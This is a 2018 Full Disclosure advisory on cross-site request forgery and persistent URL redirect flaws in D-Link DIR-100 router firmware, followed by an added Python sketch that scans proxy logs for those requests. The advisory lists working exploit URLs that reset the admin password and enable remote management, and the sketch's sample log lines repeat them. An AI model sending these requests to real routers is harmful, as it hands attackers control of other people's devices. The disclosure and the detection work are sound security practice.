[FD] New vulnerabilities in D-Link DIR-100
- To: <submissions@xxxxxxxxxxxxxxxxxxxxxxx>, <fulldisclosure@xxxxxxxxxxxx>
- Subject: [FD] New vulnerabilities in D-Link DIR-100
- From: "MustLive" <mustlive@xxxxxxxxxxxxxxxxxx>
- Date: Wed, 31 Jan 2018 19:03:13 +0200
Hello list!
There are Cross-Site Request Forgery and URL Redirector Abuse
vulnerabilities in D-Link DIR-100. This is my second advisory for DIR-100.
-------------------------
Affected products:
-------------------------
The following model is vulnerable: D-Link DIR-100, Firmware v1.01. All other
versions must also be vulnerable.
----------
Details:
----------
Cross-Site Request Forgery (WASC-09):
Change admin's password:
http://site/Tools/tools_admin.xgi?SET/sys/account/superUserName=admin&SET/sys/account/superUserPassword=admin
Turn on Remote Management:
http://site/Tools/tools_admin.xgi?SET/security/firewall/httpAllow=1&SET/security/firewall/httpRemotePort=80
CSRF attack to change admin's password and turn on Remote Management:
http://site/Tools/tools_admin.xgi?SET/sys/account/superUserName=admin&SET/sys/account/superUserPassword=admin&SET/security/firewall/httpAllow=1&SET/security/firewall/httpRemotePort=80
URL Redirector Abuse (WASC-38):
http://site/Tools/vs.htm?location=http://www.google.com
This is a Persisted Redirector attack. After an address is set in the location
parameter, it is saved, and later it is possible to redirect just by visiting
the page http://site/Tools/vs.htm.
I mentioned these vulnerabilities on my site
(http://websecurity.com.ua/8021/).
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
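
Added example, not part of the original advisory or any D-Link code: a detection sketch that scans web-proxy log lines for the request shapes listed above (SET/ parameters on tools_admin.xgi arriving with a missing or foreign Referer, and an external address being stored through vs.htm). The log layout, the router address 192.168.0.1 and every sample line are assumptions constructed for the example.

```python
from urllib.parse import urlsplit, parse_qsl

# Paths and parameter names come from the advisory; the log layout
# "time client method url referer" and all sample lines are constructed.
ADMIN_PATH = "/Tools/tools_admin.xgi"
REDIRECT_PATH = "/Tools/vs.htm"
SAMPLE_LOG = [
    "2018-01-31T10:00:01 192.168.0.23 GET http://192.168.0.1/Tools/tools_admin.xgi?SET/security/firewall/httpAllow=1&SET/security/firewall/httpRemotePort=80 http://example.test/page.html",
    "2018-01-31T10:05:00 192.168.0.10 GET http://192.168.0.1/Tools/tools_admin.xgi?SET/security/firewall/httpAllow=0 http://192.168.0.1/",
    "2018-01-31T10:07:12 192.168.0.23 GET http://192.168.0.1/Tools/vs.htm?location=http://example.test/ -",
    "2018-01-31T10:09:30 192.168.0.10 GET http://192.168.0.1/Tools/vs.htm -",
]

def host_of(url):
    """Lower-cased host of a URL, or "" when absent (e.g. Referer "-")."""
    return (urlsplit(url).hostname or "").lower()

def classify(router_host, url, referer):
    """Return a finding for one request to the router, or None."""
    router_host = router_host.lower()
    parts = urlsplit(url)
    if host_of(url) != router_host:
        return None
    params = parse_qsl(parts.query, keep_blank_values=True)
    if parts.path == ADMIN_PATH:
        # Report only the keys, never the values (one of them is a password).
        keys = [k for k, _ in params if k.startswith("SET/")]
        # A missing or foreign Referer on a state-changing GET is the CSRF signal.
        if keys and host_of(referer) != router_host:
            return "csrf-suspect: " + ",".join(keys)
    if parts.path == REDIRECT_PATH:
        # An external address stored in "location" persists for later visitors.
        for k, v in params:
            if k == "location" and host_of(v) not in ("", router_host):
                return "redirector-set: " + v
    return None

def scan(lines, router_host):
    """Return (client, finding) pairs for every flagged GET in the log."""
    findings = []
    for line in lines:
        _ts, client, method, url, referer = line.split()
        finding = classify(router_host, url, referer) if method == "GET" else None
        if finding:
            findings.append((client, finding))
    return findings

if __name__ == "__main__":
    for client, finding in scan(SAMPLE_LOG, "192.168.0.1"):
        print(client, finding)
```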